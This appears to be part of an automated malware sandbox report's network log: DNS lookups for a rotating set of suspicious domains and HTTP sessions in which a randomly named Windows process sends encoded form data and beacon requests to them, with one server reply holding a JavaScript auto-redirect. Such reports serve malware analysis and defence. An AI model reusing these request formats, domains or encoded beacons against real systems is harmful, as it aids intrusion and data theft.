                                                                Nov 27, 2024 08:54:53.673640013 CET5810653192.168.2.61.1.1.1
                                                                Nov 27, 2024 08:54:53.751955032 CET53581061.1.1.1192.168.2.6
                                                                Nov 27, 2024 08:54:53.811294079 CET53581061.1.1.1192.168.2.6
                                                                Nov 27, 2024 08:55:08.333807945 CET6362253192.168.2.61.1.1.1
                                                                Nov 27, 2024 08:55:08.853184938 CET53636221.1.1.1192.168.2.6
                                                                Nov 27, 2024 08:55:23.350951910 CET5246053192.168.2.61.1.1.1
                                                                Nov 27, 2024 08:55:23.922013998 CET53524601.1.1.1192.168.2.6
                                                                Nov 27, 2024 08:55:38.475526094 CET5039653192.168.2.61.1.1.1
                                                                Nov 27, 2024 08:55:38.840070963 CET53503961.1.1.1192.168.2.6
                                                                Nov 27, 2024 08:55:53.725893021 CET5580553192.168.2.61.1.1.1
                                                                Nov 27, 2024 08:55:54.155776978 CET53558051.1.1.1192.168.2.6
                                                                Nov 27, 2024 08:56:08.896739960 CET6118053192.168.2.61.1.1.1
                                                                Nov 27, 2024 08:56:09.324672937 CET53611801.1.1.1192.168.2.6
                                                                Nov 27, 2024 08:56:23.787120104 CET5490453192.168.2.61.1.1.1
                                                                Nov 27, 2024 08:56:24.230391026 CET53549041.1.1.1192.168.2.6
                                                                Nov 27, 2024 08:56:32.287235975 CET5647253192.168.2.61.1.1.1
                                                                Nov 27, 2024 08:56:32.728244066 CET53564721.1.1.1192.168.2.6
                                                                Nov 27, 2024 08:56:47.085015059 CET6165353192.168.2.61.1.1.1
                                                                Nov 27, 2024 08:56:48.080501080 CET6165353192.168.2.61.1.1.1
                                                                Nov 27, 2024 08:56:49.080096960 CET6165353192.168.2.61.1.1.1
                                                                Nov 27, 2024 08:56:50.030931950 CET53616531.1.1.1192.168.2.6
                                                                Nov 27, 2024 08:56:50.030946970 CET53616531.1.1.1192.168.2.6
                                                                Nov 27, 2024 08:56:50.030966043 CET53616531.1.1.1192.168.2.6
                                                                Nov 27, 2024 08:57:04.834625959 CET5143353192.168.2.61.1.1.1
                                                                Nov 27, 2024 08:57:05.399054050 CET53514331.1.1.1192.168.2.6

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Nov 27, 2024 08:53:44.108885050 CET192.168.2.61.1.1.10xa4bdStandard query (0)www.nb-shenshi.buzzA (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:54:01.005546093 CET192.168.2.61.1.1.10x387cStandard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:54:16.460041046 CET192.168.2.61.1.1.10x334fStandard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:54:17.454854012 CET192.168.2.61.1.1.10x334fStandard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:54:52.662734985 CET192.168.2.61.1.1.10xaa63Standard query (0)www.soainsaat.xyzA (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:54:53.673640013 CET192.168.2.61.1.1.10xaa63Standard query (0)www.soainsaat.xyzA (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:55:08.333807945 CET192.168.2.61.1.1.10xaf1cStandard query (0)www.amayavp.xyzA (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:55:23.350951910 CET192.168.2.61.1.1.10xacb3Standard query (0)www.vayui.topA (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:55:38.475526094 CET192.168.2.61.1.1.10x9a50Standard query (0)www.rgenerousrs.storeA (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:55:53.725893021 CET192.168.2.61.1.1.10xa18Standard query (0)www.t91rl7.proA (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:56:08.896739960 CET192.168.2.61.1.1.10xa8b3Standard query (0)www.learnwithus.siteA (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:56:23.787120104 CET192.168.2.61.1.1.10x7926Standard query (0)www.cuthethoi.onlineA (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:56:32.287235975 CET192.168.2.61.1.1.10x98deStandard query (0)www.rafconstrutora.onlineA (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:56:47.085015059 CET192.168.2.61.1.1.10x30aStandard query (0)www.7vh2wy.topA (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:56:48.080501080 CET192.168.2.61.1.1.10x30aStandard query (0)www.7vh2wy.topA (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:56:49.080096960 CET192.168.2.61.1.1.10x30aStandard query (0)www.7vh2wy.topA (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:57:04.834625959 CET192.168.2.61.1.1.10x3282Standard query (0)www.duwixushx.xyzA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Nov 27, 2024 08:53:44.586126089 CET1.1.1.1192.168.2.60xa4bdNo error (0)www.nb-shenshi.buzz161.97.168.245A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:54:01.703109980 CET1.1.1.1192.168.2.60x387cNo error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                                Nov 27, 2024 08:54:01.703109980 CET1.1.1.1192.168.2.60x387cNo error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:54:01.703109980 CET1.1.1.1192.168.2.60x387cNo error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:54:01.703109980 CET1.1.1.1192.168.2.60x387cNo error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:54:01.703109980 CET1.1.1.1192.168.2.60x387cNo error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:54:17.566705942 CET1.1.1.1192.168.2.60x334fNo error (0)www.xcvbj.asia149.88.81.190A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:54:17.593024969 CET1.1.1.1192.168.2.60x334fNo error (0)www.xcvbj.asia149.88.81.190A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:54:53.751955032 CET1.1.1.1192.168.2.60xaa63No error (0)www.soainsaat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                Nov 27, 2024 08:54:53.751955032 CET1.1.1.1192.168.2.60xaa63No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                Nov 27, 2024 08:54:53.751955032 CET1.1.1.1192.168.2.60xaa63No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:54:53.811294079 CET1.1.1.1192.168.2.60xaa63No error (0)www.soainsaat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                Nov 27, 2024 08:54:53.811294079 CET1.1.1.1192.168.2.60xaa63No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                Nov 27, 2024 08:54:53.811294079 CET1.1.1.1192.168.2.60xaa63No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:55:08.853184938 CET1.1.1.1192.168.2.60xaf1cNo error (0)www.amayavp.xyz185.27.134.144A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:55:23.922013998 CET1.1.1.1192.168.2.60xacb3No error (0)www.vayui.top172.67.145.234A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:55:23.922013998 CET1.1.1.1192.168.2.60xacb3No error (0)www.vayui.top104.21.95.160A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:55:38.840070963 CET1.1.1.1192.168.2.60x9a50No error (0)www.rgenerousrs.store172.67.167.146A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:55:38.840070963 CET1.1.1.1192.168.2.60x9a50No error (0)www.rgenerousrs.store104.21.57.248A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:55:54.155776978 CET1.1.1.1192.168.2.60xa18No error (0)www.t91rl7.pro154.88.22.101A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:56:09.324672937 CET1.1.1.1192.168.2.60xa8b3No error (0)www.learnwithus.site209.74.77.107A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:56:24.230391026 CET1.1.1.1192.168.2.60x7926Server failure (2)www.cuthethoi.onlinenonenoneA (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:56:32.728244066 CET1.1.1.1192.168.2.60x98deNo error (0)www.rafconstrutora.online104.21.34.103A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:56:32.728244066 CET1.1.1.1192.168.2.60x98deNo error (0)www.rafconstrutora.online172.67.159.24A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:56:50.030931950 CET1.1.1.1192.168.2.60x30aNo error (0)www.7vh2wy.top20.2.249.7A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:56:50.030946970 CET1.1.1.1192.168.2.60x30aNo error (0)www.7vh2wy.top20.2.249.7A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:56:50.030966043 CET1.1.1.1192.168.2.60x30aNo error (0)www.7vh2wy.top20.2.249.7A (IP address)IN (0x0001)false
                                                                Nov 27, 2024 08:57:05.399054050 CET1.1.1.1192.168.2.60x3282No error (0)www.duwixushx.xyz156.251.17.224A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • www.nb-shenshi.buzz
                                                                • www.laohub10.net
                                                                • www.xcvbj.asia
                                                                • www.soainsaat.xyz
                                                                • www.amayavp.xyz
                                                                • www.vayui.top
                                                                • www.rgenerousrs.store
                                                                • www.t91rl7.pro
                                                                • www.learnwithus.site
                                                                • www.rafconstrutora.online
                                                                • www.7vh2wy.top
                                                                • www.duwixushx.xyz

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.649777161.97.168.245804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:53:44.728030920 CET501OUTGET /xxr1/?6dr=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=&Kp=6N8LUn6pGPW HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.nb-shenshi.buzz
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Nov 27, 2024 08:53:45.960243940 CET1236INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:53:45 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 2966
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                ETag: "66cd104a-b96"
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                Nov 27, 2024 08:53:45.960347891 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                Nov 27, 2024 08:53:45.960359097 CET448INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
                                                                Nov 27, 2024 08:53:45.960370064 CET250INData Raw: 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 3c 70 3e 50 6c 65 61 73 65 20 63
                                                                Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.64981927.124.4.246804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:54:01.844566107 CET755OUTPOST /sgdd/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.laohub10.net
                                                                Origin: http://www.laohub10.net
                                                                Referer: http://www.laohub10.net/sgdd/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 65 34 36 63 61 31 4d 5a 39 73 73 51 66 6c 58 34 69 6a 2f 61 2b 57 44 44 38 76 72 6e 51 68 2f 4a 59 47 78 75 50 78 63 4b 77 47 55 50
                                                                Data Ascii: 6dr=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLe46ca1MZ9ssQflX4ij/a+WDD8vrnQh/JYGxuPxcKwGUP
                                                                Nov 27, 2024 08:54:03.190831900 CET525INHTTP/1.1 200 OK
                                                                Server: Apache
                                                                Content-Type: text/html; charset=utf-8
                                                                Accept-Ranges: bytes
                                                                Cache-Control: max-age=86400
                                                                Age: 1
                                                                Connection: Close
                                                                Content-Length: 350
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.64982427.124.4.246804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:54:04.517178059 CET779OUTPOST /sgdd/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.laohub10.net
                                                                Origin: http://www.laohub10.net
                                                                Referer: http://www.laohub10.net/sgdd/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 36 55 6f 50 53 48 6e 66 76 5a 41 4c 76 79 58 66 75 62 76 7a 6c 30 4d 4f 72 4b 6d 78 74 50 59 59 46 50 2b 6d 63 55 42 55 70 57 37 54 68 2f 44 4d 52 64 32 76 49 39 68 70 55 33 41 44 31 64 55 41 32 64 4b 41 6e 4e 76 53 4c 54 78 44 4f 67 67 52 62 72 31 65 4e 71 79 4d 6e 5a 6a 4a 6e 41 61 69 4d 43 65 39 67 4e 77 39 65 64 75 34 6b 75 52 6d 2b 70 62 43 4f 64 42 66 61 37 6a 51 6b 73 71 38 62 6b 52 58 7a 4b 69 2b 51 2f 35 73 47 6a 42 38 74 7a 56 51 42 2f 6a 61 47 4a 75 64 6d 51 74 2f 79 78 73 46 7a 51 70 44 31 34 34 67 4d 54 4e 46 55 69 35 31 76 61 64 7a 67 3d 3d
                                                                Data Ascii: 6dr=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we6UoPSHnfvZALvyXfubvzl0MOrKmxtPYYFP+mcUBUpW7Th/DMRd2vI9hpU3AD1dUA2dKAnNvSLTxDOggRbr1eNqyMnZjJnAaiMCe9gNw9edu4kuRm+pbCOdBfa7jQksq8bkRXzKi+Q/5sGjB8tzVQB/jaGJudmQt/yxsFzQpD144gMTNFUi51vadzg==
                                                                Nov 27, 2024 08:54:05.865360975 CET525INHTTP/1.1 200 OK
                                                                Server: Apache
                                                                Content-Type: text/html; charset=utf-8
                                                                Accept-Ranges: bytes
                                                                Cache-Control: max-age=86400
                                                                Age: 1
                                                                Connection: Close
                                                                Content-Length: 350
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.64983127.124.4.246804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:54:07.195000887 CET1792OUTPOST /sgdd/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.laohub10.net
                                                                Origin: http://www.laohub10.net
                                                                Referer: http://www.laohub10.net/sgdd/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 38 4d 6f 50 6e 54 6e 4e 38 78 41 4b 76 79 58 54 4f 62 75 7a 6c 30 52 4f 72 6a 74 78 74 43 6a 59 47 6e 2b 70 5a 41 42 54 59 57 37 4a 78 2f 44 54 68 64 7a 73 34 38 6a 70 56 61 4a 44 31 4e 55 41 32 64 4b 41 6b 56 76 62 2f 2f 78 42 4f 67 6a 59 37 72 35 4a 64 72 58 4d 6d 78 7a 4a 6d 51 67 6a 34 2b 65 2b 41 64 77 2b 73 31 75 33 6b 75 54 71 65 70 44 43 4f 52 43 66 61 6d 59 51 6b 59 54 38 63 55 52 48 6d 37 6e 6b 68 44 67 34 31 6e 63 72 36 66 5a 64 30 54 70 53 46 70 6c 53 31 73 4a 34 7a 4a 46 46 47 51 67 46 48 31 41 77 63 7a 33 4d 30 66 57 2b 76 4c 4f 76 73 4d 66 4e 2f 75 75 52 6a 61 6a 6e 77 6b 32 77 37 42 70 5a 48 48 36 33 71 4e 6e 43 2f 34 44 6d 4d 55 2f 6c 4b 53 66 6a 78 63 4c 63 71 6a 38 34 44 4f 68 51 74 6c 43 6d 68 45 65 47 5a 42 46 50 2b 69 53 36 56 65 7a 55 6f 59 49 2b 78 36 55 43 58 6e 73 4a 55 74 46 32 6e 32 5a 53 54 31 47 76 74 68 35 38 71 4e 65 53 56 6c 73 72 78 [TRUNCATED]
